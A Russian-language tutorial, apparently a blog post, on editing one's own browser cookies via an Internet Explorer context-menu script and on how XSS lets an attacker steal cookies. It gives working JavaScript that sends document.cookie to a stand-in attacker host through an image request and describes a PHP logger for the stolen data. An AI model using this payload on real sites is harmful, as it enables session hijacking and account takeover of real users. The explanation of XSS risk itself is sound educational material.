Как изменить или подменить cookie?

Разработчики браузеров не предоставляют встроенных средств для редактирования cookie. Но можно обойтись и обычным блокнотом (notepad).

Шаг 1: создаем текстовый файл с текстом

Windows Registry Editor Version 5.00



@="C:\\IE_ext.htm"

Сохраняем его под именем IE_ext.reg

Шаг 2: С помощью созданного файла добавляем изменения в реестр Windows.

Шаг 3: создаем текстовый файл с текстом

< script language ="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru" ;
alert(external.menuArguments.document.cookie);

Сохраняем его под именем C:\IE_ext.htm

Шаг 4: Заходим на интересующий нас интернет-сайт.

Шаг 5: Правой кнопкой мыши кликам на свободном месте странице и выбираем пункт меню «Работа с Cookies» . Разрешаем доступ к буферу обмена. В буфер обмена попадут Ваши cookie данного сайт. Можете вставить их блокнот (notepad) и посмотреть.

Шаг 6: Для изменения некоторого cookie редактируем файл C:\IE_ext.htm, заменяя testname на имя cookie, testvalue - на его значение, testdomain.ru – на домен сайта. При необходимости добавляем еще подобные строчки. Для удобства контроля я добавил в скрипт вывод текущих cookie до и после изменения: alert(external.menuArguments.document.cookie);

Шаг 7: Выполняем еще раз Шаг 5, а потом обновляем страницу.

Итог: мы зайдем на данный интернет-ресурс с обновленными cookie.

Как украсть cookie с помощью JavaScript?

Если злоумышленнику удалось найти возможность выполнить произвольный JavaScript-скрипт на компьютере жертвы, то прочитать текущие cookie он может очень легко. Пример:

var str= document.cookie;

Но сможет ли он их передать на свой сайт, ведь, как я указывал ранее, JavaScript-скрипт не сможет без дополнительного подтверждения обратиться к сайту, находящемуся в другом домене? Оказывается, JavaScript-скрипт может загрузить любую картинку, находящуюся на любом http-сервере. При этом передать любую текстовую информацию в запросе на загрузку этой картинке. Пример: http://hackersite.ru/xss.jpg?text_info Поэтому если выполнить такой код:

var img=new Image();

img.src="http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);

то cookie окажутся в запросе на загрузку «картинки» и «уйдут» к злоумышленнику.

Как обрабатывать такие запросы на загрузку «картинки»?

Злоумышленнику нужно лишь найти хостинг с поддержкой php и разместить там код подобный такому:

Тогда все параметры запросов к этому скрипту будут сохраняться в файле log.txt . Осталось лишь в ранее описанном JavaScript-скрипте заменить http://hackersite.ru/xss.jpg на путь к данному php-скрипту.

Итог

Я показал лишь самый простой способ использования XSS-уязвимостей. Но это доказывает, что наличие хотя бы одной такой уязвимостей на многопользовательском интернет-сайте может позволяет злоумышленнику пользоваться его ресурсами от Вашего имени.